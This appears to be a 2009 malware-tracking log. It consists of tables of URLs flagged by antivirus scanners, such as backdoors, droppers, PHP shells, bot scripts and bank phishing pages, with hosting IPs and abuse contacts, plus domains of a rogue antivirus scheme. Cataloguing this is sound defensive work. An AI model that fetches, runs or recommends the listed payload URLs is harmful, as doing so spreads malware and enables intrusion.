| 2009-07-21 13:24:50 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/isengbu/ |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/FreeStuff/Rapidshare/Verify.html |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/friendters/tas/ |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/friendters/tas/? |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Gametimegenerator/ |
| 2009-07-21 13:24:49 | avira | BDS/Bifrose.aqib | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/glg/Network-Dmar.exe |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Grokers |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Grokers/ |
| 2009-07-21 13:24:49 | avira | TR/Dropper.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/Haamas/server.exe |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hackerbpp/Login/login-next.html |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hackerbpp/Login/login-next.html? |
| 2009-07-21 13:24:49 | avira | HTML/Infected.WebPage.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/halifaxinternetbanki/mybank(1)(1).alliance-leicester.co.uk.htm |
| 2009-07-21 13:24:49 | avira | TR/Dldr.Tiny.CA | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/haneene/server.com |
| 2009-07-21 13:24:49 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/hayes/login.html |
| 2009-07-21 13:24:48 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/DeviLTakumi/login.php |
| 2009-07-21 13:24:48 | avira | TR/Agent.uckr | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/dickybob2525/system.exe |
| 2009-07-21 13:24:48 | avira | DR/Delphi.Gen | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/dickybob2525/web/120.exe |
| 2009-07-21 13:24:48 | undef | unknown_html | 64.62.181.46 | abuse@he.net | US | ARIN | HURRICANE-4 | http://h1.ripway.com/doger/Login.html &nb
-
sites related XP Deluxe Protector rogue
http://antispy2009.net/onlinescan/index.php -> fake scanner page
http://antispy2009.net/setup.exe -> Rogue downloader
http://downloadsoftwareserver3.com/gdi32lib.dll
http://downloadsoftwareserver3.com/xpdeluxe.exe
xp-deluxeprotector.com - homepage
-
http://scanriteweb.com/hitin.php?land=98&affid=16100
http://scanriteweb.com/download.php?affid=16100
http://securityscanavailable.com/hitin.php?land=20&affid=20100
http://securityscanavailable.com/download.php?affid=20100
http://exereload.com/onlinemovies.1.48040.exe
-
21/22/23 Jul new malware
+----------------------+---------+--------------------------------+-----------------+--------------------------------+---------+--------+---------------------------+--------------------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname | review | email | country | source | netname | url |
+----------------------+---------+--------------------------------+-----------------+--------------------------------+---------+--------+---------------------------+--------------------------------------------------------------------------------------------------+
| 2009-07-23 18:01:43 | undef | unknown_onlinemovies.45017.exe | 95.211.8.20 | abuse@leaseweb.com | NL | RIPE | NL-LEASEWEB-20080724 | http://load-exe-world.com/onlinemovies.45017.exe |
| 2009-07-23 18:01:34 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/cinema_plugin_a605_install.exe |
| 2009-07-23 18:01:34 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/iradio_plugin_a605_install.exe |
| 2009-07-23 18:01:34 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/videopodcast_plugin_a605_install.exe |
| 2009-07-23 18:01:33 | undef | unknown_ArchosInstaller.exe | 83.167.45.32 | abuse@neotelecoms.com | FR | RIPE | PLANETSERVICE-1-NEOT | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/webbrowser_plugin_a605_install.exe |
| 2009-07-23 17:00:20 | avira | PHP/BackDoor.E | 202.157.150.105 | indra@webvisions.com | SG | APNIC | WEBVISIONS-SERVER | http://www.fusionc.com/_private/id.jpg |
| 2009-07-23 16:43:45 | avira | EXP/PHP.E | 64.235.57.20 | noc@premianet.com | US | ARIN | APH-LAS-NV1 | http://www.virtualhost.com.mx/xeonbox/xpl/list |
| 2009-07-23 16:18:57 | avira | TR/PHP.PHPInfo.D | 211.202.2.220 | abuse@hanaro.com | KR | APNIC | HANANET | http://dwno.or.kr/bbs/data/swat/v6.txt |
| 2009-07-23 16:18:30 | clamav | PHP.Shell-11 | 58.86.38.41 | maxchang@kbtelecom.net | TW | APNIC | KBT-NET | http://18-kk.com/bot/pbot.txt |
| 2009-07-23 16:13:56 | avira | PHP/Pbot.A.6 | 213.195.69.64 | abuse@ibercom.com | ES | RIPE | IBERCOMNET | http://www.etxeonenak.com/archivos/alisei.txt |
| 2009-07-23 16:03:18 | undef | unknown_html_RFI_php | 213.155.31.144 | kackad@list.ru | UA | RIPE | skylog | http://skylog.kz/5c464da2bb6908cbd39dacdd4f42bac9/id1.txt |
| 2009-07-23 15:34:50 | clamav | PHP.ShellExec | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/andika.arganata/ping/mildnet.txt |
| 2009-07-23 15:34:06 | avira | PHP/Pbot.A.6 | 78.129.205.31 | abuse_rs@altervista.it | IT | RIPE | AlterVista_1 | http://idididid.altervista.org/dark.txt |
| 2009-07-23 15:23:29 | undef | unknown_html_RFI_php | 211.202.2.220 | abuse@hanaro.com | KR | APNIC | HANANET | http://dwno.or.kr/bbs/data/swat/tes.txt |
| 2009-07-23 15:14:41 | undef | unknown_html_RFI_php | 208.109.14.78 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.net-www.info/rotaryxativa/modules/z1 |
| 2009-07-23 15:08:50 | undef | unknown_html_RFI_php | 211.47.128.229 | abuse@sknetworks.co.kr | KR | APNIC | KRNIC-KR | http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt |
| 2009-07-23 15:02:04 | undef | unknown_html_RFI_php | 67.217.53.31 | hdnoc@hostdepartment.com | US | ARIN | WORLD-ISP-NETWORK | http://route1eventservices.com/coppermine/include/fx29id.txt |
| 2009-07-23 14:54:30 | undef | unknown_html_RFI_php | 132.198.48.12 | abuse@uvm.edu | US | ARIN | UVM-NET | http://esf.uvm.edu/rmsp/skins/myskin/css/id1.txt |
| 2009-07-23 14:54:22 | avira | PHP/Info.A | 132.198.48.12 | abuse@uvm.edu | US | ARIN | UVM-NET | http://esf.uvm.edu/rmsp/skins/myskin/css/idd.txt |
| 2009-07-23 14:22:51 | clamav | PHP.Downloader-4 | 110.45.138.139 | support@kidc.net | KR | APNIC | KIDC | http://www.shinsungbuk.com/BOARD/skin/ggambo7002_gallery/vti/spread.txt |
| 2009-07-23 14:18:17 | avira | PHP/BackDoor.AR | 58.230.118.105 | abuse@hanaro.com | KR | APNIC | HANANET | http://shalomchair.com/fx29id2.txt |
| 2009-07-23 14:07:08 | avira | PHP/C99Shell.C | 65.247.182.200 | abuse-mail@verizonbusiness.com | US | ARIN | UUNET65-2 | http://65.247.182.200/r |
| 2009-07-23 14:05:28 | avira | SPR/PHP.ID | 59.4.104.174 | abuse@kornet.net | KR | APNIC | KORNET | http://80.mipyeong.or.kr/fr.txt |
| 2009-07-23 14:04:38 | avira | SPR/PHP.ID &